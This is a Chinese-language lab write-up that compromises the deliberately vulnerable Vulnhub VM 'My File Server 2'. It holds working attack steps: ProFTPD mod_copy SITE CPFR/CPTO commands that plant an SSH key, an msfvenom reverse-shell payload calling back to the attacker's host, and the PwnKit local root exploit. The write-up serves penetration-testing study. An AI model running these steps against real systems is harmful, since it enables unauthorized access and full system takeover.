Vulnhub之My File Server 2靶机详细测试过程(利用Metasploit实现本地提权相当的爽)

My File Server 2

作者:jason huawen

靶机信息

名称:My File Server: 2

地址:

https://www.vulnhub.com/entry/my-file-server-2,442/

将上述靶机的虚拟机导入到VirtualBox,并设置网络模式为host-only,与攻击机Kali Linux为同一局域网。

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:15:69:14      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.104  08:00:27:4f:61:58      1      60  PCS Systemtechnik GmbH         

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.104

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-02 21:40 EDT
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00052s latency).
Not shown: 64445 filtered tcp ports (no-response), 78 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.230
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
|   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: My File Server
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      35080/tcp   nlockmgr
|   100021  1,3,4      40393/udp6  nlockmgr
|   100021  1,3,4      45446/tcp6  nlockmgr
|   100021  1,3,4      60480/udp   nlockmgr
|   100024  1          36358/udp6  status
|   100024  1          48374/udp   status
|   100024  1          51953/tcp   status
|   100024  1          58193/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:4F:61:58 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-03T01:41:43
|_  start_date: N/A
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2023-04-03T07:11:44+05:30
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.49 seconds

获得Shell

由于目标主机有多个开放端口,因此需要逐一对各个端口进行信息收集。

端口21

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ftp 192.168.56.104
Connected to 192.168.56.104.
220 (vsFTPd 3.0.2)
Name (192.168.56.104:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5547|).
150 Here comes the directory listing.
drwxr-xr-x    3 0        0              16 Feb 18  2020 .
drwxr-xr-x    3 0        0              16 Feb 18  2020 ..
drwxrwxrwx    3 0        0              16 Feb 19  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5861|).
150 Here comes the directory listing.
drwxrwxrwx    3 0        0              16 Feb 19  2020 .
drwxr-xr-x    3 0        0              16 Feb 18  2020 ..
drwxr-xr-x    9 0        0            4096 Feb 19  2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5001|).
150 Here comes the directory listing.
drwxr-xr-x    9 0        0            4096 Feb 19  2020 .
drwxrwxrwx    3 0        0              16 Feb 19  2020 ..
drwxr-xr-x    2 0        0            4096 Feb 19  2020 anaconda
drwxr-x---    2 0        0              22 Feb 19  2020 audit
-rw-r--r--    1 0        0            7033 Feb 19  2020 boot.log
-rw-------    1 0        0           10752 Feb 19  2020 btmp
-rw-r--r--    1 0        0            9161 Feb 19  2020 cron
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg.old
drwxr-xr-x    2 0        0               6 Feb 19  2020 glusterfs
drwx------    2 0        0              39 Feb 19  2020 httpd
-rw-r--r--    1 0        0          292584 Feb 19  2020 lastlog
-rw-------    1 0        0            3764 Feb 19  2020 maillog
-rw-------    1 0        0         1423423 Feb 19  2020 messages
drwx------    2 0        0               6 Feb 19  2020 ppp
drwx------    4 0        0              43 Feb 19  2020 samba
-rw-------    1 0        0           63142 Feb 19  2020 secure
-rw-------    1 0        0               0 Feb 19  2020 spooler
-rw-------    1 0        0               0 Feb 19  2020 tallylog
drwxr-xr-x    2 0        0              22 Feb 19  2020 tuned
-rw-r--r--    1 0        0           58752 Feb 19  2020 wtmp
-rw-------    1 0        0             100 Feb 19  2020 xferlog
-rw-------    1 0        0           18076 Feb 19  2020 yum.log
226 Directory send OK.

虽然目标主机允许匿名用户访问,但是目录中的文件没有太大价值。

端口445

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient -L 192.168.56.104       
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        smbdata         Disk      smbdata
        smbuser         Disk      smbuser
        IPC$            IPC       IPC Service (Samba 4.9.1)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.104 failed (Error NT_STATUS_HOST_UNREACHABLE)
Unable to connect with SMB1 -- no workgroup available

有两个共享目录smbdata, smbuser

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb 21 01:50:09 2020
  ..                                  D        0  Tue Feb 18 06:47:54 2020
  anaconda                            D        0  Tue Feb 18 06:48:15 2020
  audit                               D        0  Tue Feb 18 06:48:15 2020
  boot.log                            N     6120  Tue Feb 18 06:48:16 2020
  btmp                                N      384  Tue Feb 18 06:48:16 2020
  cron                                N     4813  Tue Feb 18 06:48:16 2020
  dmesg                               N    31389  Tue Feb 18 06:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 06:48:16 2020
  glusterfs                           D        0  Tue Feb 18 06:48:16 2020
  lastlog                             N   292292  Tue Feb 18 06:48:16 2020
  maillog                             N     1982  Tue Feb 18 06:48:16 2020
  messages                            N   684379  Tue Feb 18 06:48:17 2020
  ppp                                 D        0  Tue Feb 18 06:48:17 2020
  samba                               D        0  Tue Feb 18 06:48:17 2020
  secure                              N    11937  Tue Feb 18 06:48:17 2020
  spooler                             N        0  Tue Feb 18 06:48:17 2020
  tallylog                            N        0  Tue Feb 18 06:48:17 2020
  tuned                               D        0  Tue Feb 18 06:48:17 2020
  wtmp                                N    25728  Tue Feb 18 06:48:17 2020
  xferlog                             N      100  Tue Feb 18 06:48:17 2020
  yum.log                             N    10915  Tue Feb 18 06:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 02:46:38 2020
  authorized_keys                     A      389  Fri Feb 21 01:50:09 2020

                19976192 blocks of size 1024. 18285180 blocks available
smb: \> get authorized_keys 
getting file \authorized_keys of size 389 as authorized_keys (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.104\smbdata\
smb: \> put test.txt 
putting file test.txt as \test.txt (5.9 kb/s) (average 5.9 kb/s)

  1. 允许上传文件到smbdata目录,这点很重要,后续可将特定的文件上传至该目录
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

  1. 不允许匿名访问smbuser目录
─(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ enum4linux 192.168.56.104
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                  
                                                                                                                                                             
S-1-22-1-1000 Unix User\smbuser (Local User)                                                                                                                 


利用enum4linux识别出用户名smbuser

端口2121

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ftp 192.168.56.104 -P 2121
Connected to 192.168.56.104.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
Name (192.168.56.104:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||65233|)
ftp: Can't connect to `192.168.56.104:65233': No route to host
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 root     root           16 Feb 18  2020 .
drwxr-xr-x   3 root     root           16 Feb 18  2020 ..
drwxrwxrwx   3 root     root           16 Feb 19  2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root           16 Feb 19  2020 .
drwxr-xr-x   3 root     root           16 Feb 18  2020 ..
drwxr-xr-x   9 root     root         4.0k Feb 19  2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   9 root     root         4.0k Feb 19  2020 .
drwxrwxrwx   3 root     root           16 Feb 19  2020 ..
drwxr-xr-x   2 root     root         4.0k Feb 19  2020 anaconda
drwxr-x---   2 root     root           22 Feb 19  2020 audit
-rw-r--r--   1 root     root         6.9k Feb 19  2020 boot.log
-rw-------   1 root     root        10.5k Feb 19  2020 btmp
-rw-r--r--   1 root     root         8.9k Feb 19  2020 cron
-rw-r--r--   1 root     root        31.2k Feb 19  2020 dmesg
-rw-r--r--   1 root     root        31.2k Feb 19  2020 dmesg.old
drwxr-xr-x   2 root     root            6 Feb 19  2020 glusterfs
drwx------   2 root     root           39 Feb 19  2020 httpd
-rw-r--r--   1 root     root       285.7k Feb 19  2020 lastlog
-rw-------   1 root     root         3.7k Feb 19  2020 maillog
-rw-------   1 root     root         1.4M Feb 19  2020 messages
drwx------   2 root     root            6 Feb 19  2020 ppp
drwx------   4 root     root           43 Feb 19  2020 samba
-rw-------   1 root     root        61.7k Feb 19  2020 secure
-rw-------   1 root     root            0 Feb 19  2020 spooler
-rw-------   1 root     root            0 Feb 19  2020 tallylog
drwxr-xr-x   2 root     root           22 Feb 19  2020 tuned
-rw-r--r--   1 root     root        57.4k Feb 19  2020 wtmp
-rw-------   1 root     root          100 Feb 19  2020 xferlog
-rw-------   1 root     root        17.7k Feb 19  2020 yum.log
226 Transfer complete

  1. 允许匿名FTP访问

  2. 目录内容与21端口已知

──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ searchsploit ProFTPD 1.3.5        
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                        | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)                                                                    | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                                                                                  | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

  1. 存在命令执行漏洞

但是这个漏洞利用metasploit执行没有成功,还是需要利用mod copy漏洞,将本地生成的id_rsa.pub文件上传至smbuser的家目录下,

首先利用smb协议将id_rsa.pub上传至/smbdata目录下,然你利用mod copy漏洞移动该文件并重命名为authorized_keys

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ssh-keygen                          
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:GXPq6h/MYwYkQIZ6kkCZjVeQq3kZuNlsHcLf+L0RXfw kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|.+O.+.           |
|o= =        .    |
|o.+ o . o .  o   |
|+..= +   *. . .  |
| oB * = S. .   E |
| = * + *  .      |
|  o   . X.       |
|       = +.      |
|     .o....      |
+----[SHA256]-----+

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> put id_rsa.pub 
putting file id_rsa.pub as \id_rsa.pub (137.4 kb/s) (average 137.5 kb/s)

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ telnet 192.168.56.104 2121
Trying 192.168.56.104...
Connected to 192.168.56.104.
Escape character is '^]'.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
SITE CPFR /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
SITE CPTO /home/smbuser/.ssh/authorized_keys
250 Copy successful

这样就利用了ProFTPd的mod copy漏洞将id_rsa.pub公钥文件上传至smbuser的家目录

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer2]
└─$ ssh -i id_rsa smbuser@192.168.56.104               
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 2                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Fri Feb 21 12:39:36 2020
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$ 

这样我们成功的得到了用户smbuser的Shell

提权

接下来用metaploit工具进行提权,首先利用msfvenom工具构建payload:

$ msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalator.elf

将上述escalator.elf上传至目标主机的/tmp目录,并添加可执行权限

同时在Kali Linux上启动msfconsole,

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.230:6666 
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.104:41659) at 2023-04-02 22:39:49 -0400

这样就得到了meterpreter session,利用这个Meterpreter session进行提权

meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.56.104 - Collecting local exploits for x86/linux...
[*] 192.168.56.104 - 167 exploit checks are being tried...
[+] 192.168.56.104 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.104 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.104 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.104 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.104 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/netfilter_priv_esc_ipv4                        Yes                      The target appears to be vulnerable.
 3   exploit/linux/local/network_manager_vpnc_username_priv_esc         Yes                      The service is running, but could not be validated.
 4   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 5   exploit/linux/local/ptrace_sudo_token_priv_esc                     Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

有多个模块可以用于提权,选择第一个

meterpreter > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.alwwwbblxxel
[+] The target is vulnerable.
[*] Writing '/tmp/.arzick/ndpnoo/ndpnoo.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.arzick
[*] Sending stage (3020772 bytes) to 192.168.56.104
[+] Deleted /tmp/.arzick/ndpnoo/ndpnoo.so
[+] Deleted /tmp/.arzick/.bawgxle
[+] Deleted /tmp/.arzick
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.104:47993) at 2023-04-02 22:45:10 -0400
id

meterpreter > id
[-] Unknown command: id
meterpreter > getuid
Server username: root
meterpreter > shell
Process 22664 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1000(smbuser)
cd /root
ls -alh
total 44K
drwxr--r--.  4 root   root   4.0K Feb 21  2020 .
dr-xr-xr-x. 18 root   root   4.0K Feb 18  2020 ..
-rwxr--r--.  1 root   root    131 Feb 21  2020 .bash_history
-rwxr--r--.  1 root   root     18 Dec 29  2013 .bash_logout
-rwxr--r--.  1 root   root    176 Dec 29  2013 .bash_profile
-rwxr--r--.  1 root   root    176 Dec 29  2013 .bashrc
-rwxr--r--.  1 root   root    100 Dec 29  2013 .cshrc
drwxr--r--.  3 root   root     18 Feb 18  2020 .pki
drwxr--r--   2 root   root      6 Feb 19  2020 .ssh
-rwxr--r--.  1 root   root    129 Dec 29  2013 .tcshrc
-rwxr--r--   1 root   root   6.2K Feb 21  2020 .viminfo
-rwxr--r--   1 nobody nobody   48 Feb 20  2020 proof.txt
cat proof.txt
Best of Luck
af52e0163b03cbf7c6dd146351594a43

至此拿到了root shell和root flag.

经验教训

  1. 当遇到靶机有proFTPD时,那么很有可能需要利用mod_copy漏洞拷贝文件实现Shell的获取

  2. 虽然searchsploit本身直接给出了proFTPD 1.3.5版本的可执行命令漏洞,但是并没有成功。

  3. 可以用smb协议将所创建的id_rsa.pub公钥文件长传之smbdata目录,注意这里的smbdata目录为根下面的一级目录,或者说是绝对路径,然后利用proFTPD将该文件拷贝(并重命名)到/home/smbuser/.ssh/目录,因为通过enum4linux工具已经知道了目标主机存在用户名smbuser

  4. 本靶机利用了metasploit工具来实现本地提权,感觉比较爽。

热门相关:首席的独宠新娘   明月照大江   苏醒的秘密   天启预报   大神你人设崩了